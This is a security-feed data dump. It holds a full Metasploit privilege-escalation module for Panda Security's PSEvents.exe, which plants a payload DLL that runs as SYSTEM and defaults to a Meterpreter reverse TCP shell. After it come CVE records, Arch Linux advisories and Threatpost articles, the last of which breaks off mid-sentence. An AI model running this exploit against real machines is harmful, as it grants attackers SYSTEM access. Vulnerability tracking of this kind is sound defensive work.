{"id": "MSF:EXPLOIT/WINDOWS/LOCAL/PANDA_PSEVENTS", "type": "metasploit", "bulletinFamily": "exploit", "title": "Panda Security PSEvents Privilege Escalation", "description": "PSEvents.exe within several Panda Security products runs hourly with SYSTEM privileges. When run, it checks a user writable folder for certain DLL files, and if any are found they are automatically run. Vulnerable Products: Panda Global Protection 2016 (<=16.1.2) Panda Antivirus Pro 2016 (<=16.1.2) Panda Small Business Protection (<=16.1.2) Panda Internet Security 2016 (<=16.1.2)\n", "published": "2016-09-28T00:15:17", "modified": "2020-10-02T20:00:37", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2020-10-07T20:50:09", "viewCount": 238, "enchantments": {"score": {"value": 4.9, "vector": "NONE", "modified": "2020-10-07T20:50:09", "rev": 2}, "dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:E2E10B1216974B1D6453688F96E82370", "THREATPOST:3E4AC161967D7497B7CAF150B2674861", "THREATPOST:9C7885471E918DD48BFC7DAA2A95DE64", "THREATPOST:D94615CF5141CE7FB12230E1881E143D", "THREATPOST:B25B9343CBDFDF0A7721B6D1F920161F", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:EE13D5D6566D467347EEB1C981A428F9"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:C1EB97E448B0516D5F0DA6217F5EA920", "RAPID7BLOG:8C20D84F2EC2534C44799291EAD514A2"]}, {"type": "hackread", "idList": ["HACKREAD:BA8CB9ABA5BF95AD6613EB4A38481400"]}, {"type": "mssecure", "idList": ["MSSECURE:B42B640CBAB51E35DC07B81926B5F910"]}, {"type": "thn", "idList": ["THN:DD5F226B0380D3FF98CFEC615D359F85"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159504", "PACKETSTORM:159484"]}, {"type": "kitploit", "idList": ["KITPLOIT:6196584118367158327"]}, {"type": "cve", "idList": ["CVE-2020-1906", "CVE-2020-4528", "CVE-2020-25641"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:31B4D1B2F952EC799687B5891EE01EE6"]}], "modified": "2020-10-07T20:50:09", "rev": 2}, "vulnersScore": 4.9}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/panda_psevents.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Exploit::EXE\n include Exploit::FileDropper\n include Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Panda Security PSEvents Privilege Escalation',\n 'Description' => %q{\n PSEvents.exe within several Panda Security products runs hourly with SYSTEM privileges.\n When run, it checks a user writable folder for certain DLL files, and if any are found\n they are automatically run.\n Vulnerable Products:\n Panda Global Protection 2016 (<=16.1.2)\n Panda Antivirus Pro 2016 (<=16.1.2)\n Panda Small Business Protection (<=16.1.2)\n Panda Internet Security 2016 (<=16.1.2)\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n \"h00die <mike@shorebreaksecurity.com>\", # Module,\n 'Security-Assessment.com' # discovery\n ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'payload' => 'windows/meterpreter/reverse_tcp',\n 'exitfunc' => 'seh'\n },\n 'References' => [\n [\n 'EDB', '40020',\n 'URL', 'http://www.security-assessment.com/files/documents/advisory/Panda%20Security%20-%20Privilege%20Escalation.pdf',\n 'URL', 'http://www.pandasecurity.com/uk/support/card?id=100053'\n ]\n ],\n 'DisclosureDate'=> '2016-06-27'\n ))\n register_options(\n [\n OptEnum.new('DLL', [ true, 'dll to create', 'cryptnet.dll',\n ['cryptnet.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll']]),\n OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 3610]),\n ])\n end\n\n def get_path()\n case sysinfo['OS']\n when /Windows (NT|XP)/\n return '%AllUsersProfile%\\\\Application Data\\\\Panda Security\\\\Panda Devices Agent\\\\Downloads\\\\1a2d7253f106c617b45f675e9be08171'\n else #/Windows (7|8|10|2012|2008)/ we assume a modern operating system\n return '%ProgramData%\\\\Panda Security\\\\Panda Devices Agent\\\\Downloads\\\\1a2d7253f106c617b45f675e9be08171'\n end\n end\n\n def check\n if directory?(get_path())\n print_good('Vuln path exists')\n CheckCode::Appears\n else\n vprint_error(\"#{get_path()} doesn't exist on target\")\n CheckCode::Safe\n end\n end\n\n def exploit\n vprint_status(\"OS Detected as: #{sysinfo['OS']}\")\n\n payload_filepath = get_path()\n payload_filepath = \"#{payload_filepath}\\\\#{datastore['DLL']}\"\n upload_payload_dll(payload_filepath)\n\n # start the hour wait\n stime = Time.now.to_f\n print_status 'Starting the payload handler, waiting for PSEvents.exe to process folder (up to an hour)...'\n print_status \"Start Time: #{Time.now.to_s}\"\n until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f\n Rex.sleep(1)\n end\n end\n\n def upload_payload_dll(payload_filepath)\n payload = generate_payload_dll()\n print_status('Uploading the Payload DLL to the filesystem...')\n begin\n vprint_status(\"Payload DLL #{payload.length} bytes long being uploaded..\")\n write_file(payload_filepath, payload)\n register_file_for_cleanup(payload_filepath)\n rescue Rex::Post::Meterpreter::RequestError => e\n fail_with(Failure::Unknown, \"Error uploading file #{payload_filepath}: #{e.class} #{e}\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}

{"cve": [{"lastseen": "2021-02-27T14:32:47", "description": "An issue was discovered in SaltStack Salt before 3002.5. The minion's restartcheck is vulnerable to command injection via a crafted process name. This allows for a local privilege escalation by any user able to create a files on the minion in a non-blacklisted directory.", "edition": 1, "cvss3": {}, "published": "2021-02-27T05:15:00", "title": "CVE-2020-28243", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2020-28243"], "modified": "2021-02-27T05:15:00", "cpe": [], "id": "CVE-2020-28243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28243", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-02-27T14:41:30", "description": "An issue was discovered in Visualware MyConnection Server through 11.0b build 5382. Unauthenticated Remote Code Execution can occur via Arbitrary File Upload in the web service when using a myspeed/sf?filename= URI. This application is written in Java and is thus cross-platform. The Windows installation runs as SYSTEM, which means that exploitation gives one Administrator privileges on the target system.", "edition": 1, "cvss3": {}, "published": "2021-02-26T23:15:00", "title": "CVE-2021-27198", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-27198"], "modified": "2021-02-26T23:15:00", "cpe": [], "id": "CVE-2021-27198", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27198", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-02-27T14:41:30", "description": "Improper access control vulnerability in synoagentregisterd in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows local users to obtain sensitive information via a crafted kernel module.", "edition": 1, "cvss3": {}, "published": "2021-02-26T22:15:00", "title": "CVE-2021-26563", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-26563"], "modified": "2021-02-27T01:27:00", "cpe": [], "id": "CVE-2021-26563", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26563", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-02-27T14:41:29", "description": "In vpu, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05371580; Issue ID: ALPS05379093.", "edition": 1, "cvss3": {}, "published": "2021-02-26T21:15:00", "title": "CVE-2021-0366", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-0366"], "modified": "2021-02-27T00:56:00", "cpe": [], "id": "CVE-2021-0366", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-0366", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-02-27T14:41:29", "description": "In vow, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05418265.", "edition": 1, "cvss3": {}, "published": "2021-02-26T21:15:00", "title": "CVE-2021-0401", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-0401"], "modified": "2021-02-27T00:56:00", "cpe": [], "id": "CVE-2021-0401", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-0401", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-02-27T14:41:29", "description": "In jpeg, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Patch ID: ALPS05433311.", "edition": 1, "cvss3": {}, "published": "2021-02-26T21:15:00", "title": "CVE-2021-0402", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-0402"], "modified": "2021-02-27T00:55:00", "cpe": [], "id": "CVE-2021-0402", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-0402", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-02-27T14:41:29", "description": "In netdiag, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Patch ID: ALPS05475124.", "edition": 1, "cvss3": {}, "published": "2021-02-26T21:15:00", "title": "CVE-2021-0403", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-0403"], "modified": "2021-02-27T00:56:00", "cpe": [], "id": "CVE-2021-0403", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-0403", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-02-27T14:41:29", "description": "In cameraisp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05471418.", "edition": 1, "cvss3": {}, "published": "2021-02-26T21:15:00", "title": "CVE-2021-0406", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-0406"], "modified": "2021-02-27T00:56:00", "cpe": [], "id": "CVE-2021-0406", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-0406", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-02-27T14:41:29", "description": "In mobile_log_d, there is a possible information disclosure due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Patch ID: ALPS05457039.", "edition": 1, "cvss3": {}, "published": "2021-02-26T21:15:00", "title": "CVE-2021-0404", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-0404"], "modified": "2021-02-27T00:56:00", "cpe": [], "id": "CVE-2021-0404", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-0404", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-02-27T14:41:29", "description": "In performance driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05466547.", "edition": 1, "cvss3": {}, "published": "2021-02-26T21:15:00", "title": "CVE-2021-0405", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-0405"], "modified": "2021-02-27T00:56:00", "cpe": [], "id": "CVE-2021-0405", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-0405", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "archlinux": [{"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2020-28243", "CVE-2020-28972", "CVE-2020-35662", "CVE-2021-25281", "CVE-2021-25282", "CVE-2021-25283", "CVE-2021-25284", "CVE-2021-3144", "CVE-2021-3148", "CVE-2021-3197"], "description": "Arch Linux Security Advisory ASA-202102-33\n==========================================\n\nSeverity: High\nDate : 2021-02-27\nCVE-ID : CVE-2020-28243 CVE-2020-28972 CVE-2020-35662 CVE-2021-3144\nCVE-2021-3148 CVE-2021-3197 CVE-2021-25281 CVE-2021-25282\nCVE-2021-25283 CVE-2021-25284\nPackage : salt\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1624\n\nSummary\n=======\n\nThe package salt before version 3002.5-3 is vulnerable to multiple\nissues including access restriction bypass, arbitrary command\nexecution, certificate verification bypass, cross-site scripting,\ninsufficient validation, privilege escalation, directory traversal and\ninformation disclosure.\n\nResolution\n==========\n\nUpgrade to 3002.5-3.\n\n# pacman -Syu \"salt>=3002.5-3\"\n\nThe problems have been fixed upstream in version 3002.5.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-28243 (privilege escalation)\n\nAn issue was discovered in SaltStack Salt before 3002.5. The minion's\nrestartcheck is vulnerable to command injection via a crafted process\nname. This allows for a local privilege escalation by any user able to\ncreate a files on the minion in a non-blacklisted directory.\n\n- CVE-2020-28972 (certificate verification bypass)\n\nIn SaltStack Salt before 3002.5, authentication to VMware vcenter,\nvsphere, and esxi servers (in the vmware.py files) does not always\nvalidate the SSL/TLS certificate.\n\n- CVE-2020-35662 (certificate verification bypass)\n\nIn SaltStack Salt before 3002.5, when authenticating to services using\ncertain modules, the SSL certificate is not always validated.\n\n- CVE-2021-3144 (insufficient validation)\n\nIn SaltStack Salt before 3002.5, eauth tokens can be used once after\nexpiration. (They might be used to run command against the salt master\nor minions.)\n\n- CVE-2021-3148 (arbitrary command execution)\n\nAn issue was discovered in SaltStack Salt before 3002.5. Sending\ncrafted web requests to the Salt API can result in\nsalt.utils.thin.gen_thin() command injection because of different\nhandling of single versus double quotes. This is related to\nsalt/utils/thin.py.\n\n- CVE-2021-3197 (arbitrary command execution)\n\nAn issue was discovered in SaltStack Salt before 3002.5. The salt-api's\nssh client is vulnerable to a shell injection by including ProxyCommand\nin an argument, or via ssh_options provided in an API request.\n\n- CVE-2021-25281 (access restriction bypass)\n\nAn issue was discovered in SaltStack Salt before 3002.5. salt-api does\nnot honor eauth credentials for the wheel_async client. Thus, an\nattacker can remotely run any wheel modules on the master.\n\n- CVE-2021-25282 (directory traversal)\n\nAn issue was discovered in SaltStack Salt before 3002.5. The\nsalt.wheel.pillar_roots.write method is vulnerable to directory\ntraversal.\n\n- CVE-2021-25283 (cross-site scripting)\n\nAn issue was discovered in SaltStack Salt before 3002.5. The jinja\nrenderer does not protect against server side template injection\nattacks.\n\n- CVE-2021-25284 (information disclosure)\n\nAn issue was discovered in SaltStack Salt before 3002.5.\nsalt.modules.cmdmod can log credentials to the info or error log level.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/\nhttps://security.archlinux.org/CVE-2020-28243\nhttps://security.archlinux.org/CVE-2020-28972\nhttps://security.archlinux.org/CVE-2020-35662\nhttps://security.archlinux.org/CVE-2021-3144\nhttps://security.archlinux.org/CVE-2021-3148\nhttps://security.archlinux.org/CVE-2021-3197\nhttps://security.archlinux.org/CVE-2021-25281\nhttps://security.archlinux.org/CVE-2021-25282\nhttps://security.archlinux.org/CVE-2021-25283\nhttps://security.archlinux.org/CVE-2021-25284\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-33", "href": "https://security.archlinux.org/ASA-202102-33", "type": "archlinux", "title": "[ASA-202102-33] salt: multiple issues", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2020-8696", "CVE-2020-8698"], "description": "Arch Linux Security Advisory ASA-202102-34\n==========================================\n\nSeverity: Medium\nDate : 2021-02-27\nCVE-ID : CVE-2020-8696 CVE-2020-8698\nPackage : intel-ucode\nType : information disclosure\nRemote : No\nLink : https://security.archlinux.org/AVG-1588\n\nSummary\n=======\n\nThe package intel-ucode before version 20210216-1 is vulnerable to\ninformation disclosure.\n\nResolution\n==========\n\nUpgrade to 20210216-1.\n\n# pacman -Syu \"intel-ucode>=20210216-1\"\n\nThe problems have been fixed upstream in version 20210216.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-8696 (information disclosure)\n\nImproper removal of sensitive information before storage or transfer in\nsome Intel(R) Processors may allow an authenticated user to potentially\nenable information disclosure via local access.\n\n- CVE-2020-8698 (information disclosure)\n\nImproper isolation of shared resources in some Intel(R) Processors may\nallow an authenticated user to potentially enable information\ndisclosure via local access.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00381.html\nhttps://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files/releases/tag/microcode-20210216\nhttps://security.archlinux.org/CVE-2020-8696\nhttps://security.archlinux.org/CVE-2020-8698\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-34", "href": "https://security.archlinux.org/ASA-202102-34", "type": "archlinux", "title": "[ASA-202102-34] intel-ucode: information disclosure", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2021-02-27T15:08:45", "bulletinFamily": "info", "cvelist": [], "description": "Researchers warn Amazon\u2019s voice assistant Alexa is vulnerable to malicious third-party \u201cskills\u201d \u2013 voice assistant capabilities developed by third parties \u2013 that could leave smart-speaker owners vulnerable to a wide range of cyberattacks.\n\nThe security-threat claim is roundly dismissed by Amazon.\n\nResearchers scrutinized 90,194 unique skills from Amazon\u2019s skill stores across seven countries. The report, presented at the Network and Distributed System Security Symposium 2021 this week, found widespread security issues that could lead to phishing attacks or the ability to trick Alexa users into revealing sensitive information.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWhile skills expand Alexa\u2019s capabilities and functionalities, it also creates new security and privacy risks,\u201d said a group of researchers from North Carolina State University, the Ruhr-University Bochum and Google, [in a research paper](<https://www.ndss-symposium.org/wp-content/uploads/ndss2021_5A-1_23111_paper.pdf>) (PDF).\n\n\u201cWe identify several gaps in the current ecosystem that can be exploited by an adversary to launch further attacks, including registration of arbitrary developer name, bypassing of permission APIs, and making backend code changes after approval to trigger dormant intents,\u201d they said.\n\nAn Amazon spokesperson told Threatpost that the company conducts security reviews as part of skill certification, and has systems in place to continually monitor live skills for potentially malicious behavior.\n\n\u201cThe security of our devices and services is a top priority,\u201d said the Amazon spokesperson. \u201cAny offending skills we identify are blocked during certification or quickly deactivated. We are constantly improving these mechanisms to further protect our customers. We appreciate the work of independent researchers who help bring potential issues to our attention.\u201d\n\n## **What is an Amazon Alexa Skill?**\n\nA skill is essentially an application for Alexa, made by third-party developers, which can be installed or uninstalled by users on their corresponding Alexa smartphone app. These skills have a variety of functionalities \u2013 from reading stories to children, to interacting with services like Spotify.\n\nFor developers to build a skill, they need the following elements:\n\n * An invocation name identifying the skill\n * A set of \u201cintents,\u201d which are the actions Alexa users must take to invoke the skill\n * Specific words or phrases that users can utilize to invoke the desired intents\n * A cloud-based service to accept requests and consequently act on them\n * A configuration that brings the intents, invocation names and cloud-based service together, so Alexa can route the correct requests to the desired skill\n\nFinally, before the skills can be actively made public to Alexa users, developers must submit their skills to be vetted and verified by Amazon. During this vetting process, Amazon ensures that the skills meet their policy guidelines.\n\nFor instance, Amazon makes sure that the privacy policy link for the skill is valid, and that the skill meets the security requirements needed for hosting services on external servers (by checking whether the server responds to requests that aren\u2019t signed by an Amazon-approved certificate authority, for instance).\n\n## **Amazon\u2019s Alexa Skill Vetting is Lacking**\n\nHowever, researchers said they found several glaring issues with Amazon\u2019s skill vetting process. For one, developers can get away with registering skills that use some (but not others) well-known company names \u2013 such as Ring, Withings or Samsung. Bad actors could then leverage these fake skill brand names by sending phishing emails to users that link to the skill\u2019s Amazon store webpage \u2013 ultimately adding an air of legitimacy to the phishing message and tricking users into handing over valuable information.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/02/26141129/Amazon-Skills-2.png>)\n\nCredit: Researchers with North Carolina State University, the Ruhr-University Bochum and Google\n\nResearchers said they found 9,948 skills in the U.S. skill store, for instance, that shared the same invocation name with at least one other skill \u2013 and across all skill stores, they found that only 36,055 (out of the 90,194) skills had a unique invocation name.\n\n\u201cThis primarily happens because Amazon currently does not employ any automated approach to detect infringements for the use of third-party trademarks, and depends on manual vetting to catch such malevolent attempts which are prone to human error,\u201d said researchers.\n\nAnother issue highlighted by researchers is that attackers can make code changes after their skills have been approved by Amazon, opening the door for various malicious intents. The issue here stems from the ability for developers to register various intents during the certificate process.\n\n\u201cThus, an attacker can register dormant intents which are never triggered during the certification process to evade being flagged as suspicious,\u201d said researchers. \u201cHowever, after the certification process the attacker can change the backend code (e.g., change the dialogue to request for a specific information) to trigger dormant intents.\u201d\n\nIn a real-world scenario, this could open the door for attackers to make code changes that could convince a user into revealing sensitive information \u2013 such as bank account details or otherwise.\n\n## **Issues With Alexa Privacy Policy Model**\n\nResearchers said that this requesting of sensitive information points to a larger overarching, conceptual (rather than technical implementation) issue.\n\nAlexa skills can be configured to request permissions from users to access personal information from the Alexa account \u2013 such as the user\u2019s address or contact information. However, researchers said that they uncovered instances where skills bypass the permission APIs and directly request such information from end users.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/02/26141239/Amazon-Skills-3.png>)\n\nCredit: Researchers with North Carolina State University, the Ruhr-University Bochum and Google\n\nSome skills, for instance, included the name of a user\u2019s specific locations as part of the invocation phrase. Researchers pointed to local news provider \u201cPatch,\u201d which created 775 skills that include a city name. Such skills can potentially be used to track one\u2019s whereabouts, they argued.\n\n\u201cOne could argue that this is not an issue as users explicitly provide their information, however, there may be a disconnect between how developers and users perceive the permission model,\u201d said researchers. \u201cA user may not understand the difference between providing sensitive data through the permission APIs versus entering them verbally.\u201d\n\nIn another privacy issue, researchers found that 23.3 percent of the privacy policies viewed for skills were not fully disclosing the data types that were associated with permissions requested by a skill. For instance, 33 percent of skills accessing a user\u2019s full name did not disclose that type of data collection in their privacy policy.\n\n## **Amazon Alexa: Previous Skills Hacks**\n\nAlexa skills have come under scrutiny in the past, starting in 2018 when researchers created a proof-of-concept \u201crogue skill\u201d [that could eavesdrop on Alexa users](<https://threatpost.com/researchers-hacked-amazons-alexa-to-spy-on-users-again/131401/>) \u2013 and automatically transcribe every word said.\n\nIn 2019, [researchers said that vulnerabilities stemming from skills](<https://threatpost.com/alexa-google-home-eavesdropping-hack-not-yet-fixed/151164/>) could enable what they called a \u201cSmart Spies\u201d hack, which allows for [eavesdropping](<https://threatpost.com/researchers-hacked-amazons-alexa-to-spy-on-users-again/131401/>), voice-phishing, or using people\u2019s voice cues to determine passwords.\n\nAmazon, for its part, in 2019 did make a few modifications to make this \u201cSmart Spies\u201d hack more difficult \u2013 However, researchers called the mitigations are \u201ccomically ineffective,\u201d saying that Amazon (and other voice assistant makers, such as Google) need to focus on weeding out malicious skills from the getgo, rather than after they are already live.\n\nFinally, as recently as August, [researchers disclosed flaws in Alexa](<https://threatpost.com/amazon-alexa-one-click-attack-can-divulge-personal-data/158297/>) that could allow attackers to access personal data and install skills on Echo devices.\n\n\u201cOur analysis shows that while Amazon restricts access to user data for skills and has put forth a number of rules, there is still room for malicious actors to exploit or circumvent some of these rules,\u201d said researchers this week. \u201cThis can enable an attacker to exploit the trust they have built with the system.\u201d\n", "modified": "2021-02-26T21:53:26", "published": "2021-02-26T21:53:26", "id": "THREATPOST:96BBCCBD13B43391A945BF7349565C47", "href": "https://threatpost.com/amazon-dismisses-claims-alexa-skills-can-bypass-security-vetting/164316/", "type": "threatpost", "title": "Amazon Dismisses Claims Alexa \u2018Skills\u2019 Can Bypass Security Vetting Process", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T16:35:02", "bulletinFamily": "info", "cvelist": [], "description": "Cybergangs are joining forces under the guise of affiliate groups and \u201cas-a-service\u201d models, warns Maya Horowitz, the director of threat intelligence research with Check Point Research. She said the trend is driving a new and thriving cybercriminal underground economy.\n\nSeveral malware gangs have paired up over the past year \u2013 such as the FIN6 cybercrime group and the operators of the TrickBot malware. The purpose is help the other fill criminal skill gaps and ultimately be a more potent threat to victims.\n\n\u201cIn some cases, it\u2019s just an as-a-service model, so the groups don\u2019t necessarily have to know each other,\u201d Horowitz said. \u201cBut in many cases, the cooperation is so tight, that we have to assume that there\u2019s something there behind the scenes, that these groups actually communicate and complete each other\u2019s gaps in the attack chain.\u201d\n\nHorowitz talks about these partnerships and what they mean for victims, during this week\u2019s ThreatpostNOW video interview.\n\n[**Watch the full video below, or download here.**** **](<https://youtu.be/H7b704TFhW4>)\n\n_Below is a lightly edited transcript of the interview._\n\n**Lindsey Welch: **Welcome to ThreatpostNOW, Threatpost\u2019s video segment, where we do deep-dive interviews with cybersecurity experts about the top security threats, challenges and trends facing businesses today. I\u2019m joined today by Maya Horowitz, the director of threat intelligence research with Check Point Research. Maya is responsible for leading the intelligence and research efforts while leveraging her team\u2019s analysis into threat prevention products. Since Maya joined Check Point, almost seven years ago, she has successfully discovered and exposed many, many new cyber threat campaigns. So Maya, thank you so much for joining me today.\n\n**Maya Horowitz: **Great to be here.\n\n**LW**: This week, CPX 360 kicks off. And I wanted to get your thoughts on some of the biggest threats that we should be on the look out for in the year ahead. I know, we talked, I think it was a year ago actually, in New Orleans about what you were seeing then. And certainly a lot has changed both in the cybersecurity landscape, but also globally with the COVID-19 pandemic, and, and everything else. So Maya in terms of what you\u2019re seeing, what are some of the most active cybercriminal threat groups or APT groups that we should be on the lookout for this year?\n\n## **Top Malware Families to Watch Out For**\n\n**MH: **So actually, the leading malware or the [leading threat group for 2020 was Emotet](<https://threatpost.com/emotet-returns-100k-mailboxes/162584/>). And just a couple of weeks ago, [it was taken down](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>). We don\u2019t know at which extent yet but, at least for now, this malware is not a threat.\n\nBut I guess the question is, who will take the top place in our most wanted malware? And from our statistics, it looks like the answer would probably be one of the following: Either [Phorpiex, maybe Dridex,](<https://threatpost.com/new-dridex-variant-slips-by-anti-virus-detection/146134/>) [maybe QBot,](<https://threatpost.com/qbot-trojan-us-banking-customers/156624/>) all very, very broadly used malware botnets. But the question is not only which of them would be most popular, but it\u2019s also about partnerships. So with Emotet, it wasn\u2019t only about the botnet, it was actually the next-stage payloads that that were very severe, because they had partnerships with some of the top ransomware families.\n\nAnd so I think the question is both about the distribution of the botnet, but also what the next-stage malware will be, and which of them will be able to distribute some of the top ransomware, like, [Ryuk and others](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>). So I guess we\u2019ll have to wait and see which of them takes takes the lead.\n\n## **Ransomware Gangs Make Key Partnerships **\n\n**LW: **Right. And that\u2019s a really good point too about the partnership aspect of it. I know, for instance, we\u2019ve seen [TrickBot being used to deploy further ransomware](<https://threatpost.com/trickbot-returns-bootkit-functions/161873/>) and other types of malware as well. And we\u2019ve seen a lot of really interesting [partnerships between different malware variants](<https://threatpost.com/fin6-and-trickbot-combine-forces-in-anchor-attacks/154508/>). And, as you mentioned, Emotet, the recent takedown of Emotet has had a very interesting shape shaping of the malware landscape now and also we\u2019ve seen a couple of other similar takedown efforts and arrest efforts, [including with Egregor](<https://threatpost.com/egregor-ransomware-mass-media-corporate-data/159816/>) and other ones. So can you talk a little bit more about the these partnerships and how they continue to really shape the cybersecurity malware landscape?\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/02/02160341/malware-e1612299860235.jpg>)\n\n**MH:** Yeah, I guess many threat groups learned that they can\u2019t be, say full stack, with the entire tech chain. So each group or each individual has their own added value, so it could be the distribution, right? So it could be you know, I\u2019m the best at sending many emails, right I have the mailing lists and I can send many emails, someone else would have the technique on how to make people click the link or open the malicious document. And another would have the technique on how to actually then install the malware. From there, lateral movement is something else, getting the initial intelligence about the network is something else. And eventually, the part that does the damage is another thing. And we know that in many attack chains, we do have separate people or groups for each of these parts. So with Emotet, this was both the emails and the initial payload or the botnet, but then it would sometimes move on to TrickBot to do the lateral movement, and then say to Ryuk as the ransomware. So in some cases, it\u2019s just as-a-service model, so the groups don\u2019t necessarily have to know each other. But in many cases, the cooperation is so tight, that we have to assume that there\u2019s something there behind the scenes that these groups actually communicate and complete each other\u2019s gaps in the attack chain.\n\n## **Malware: As-a-Service Models Versus Partnerships**\n\n**LW: **Right, I was gonna ask, when you have those types of attack chain operations, where multiple strains of malware are being used, what are you seeing there in terms of, is it usually one group who is using an as-a-service model, as you mentioned before? What\u2019s the benefits of groups who are working together? How might they kind of split up the ensuing profit? And how does that work really on the back end?\n\n**MH: **So I can\u2019t really comment 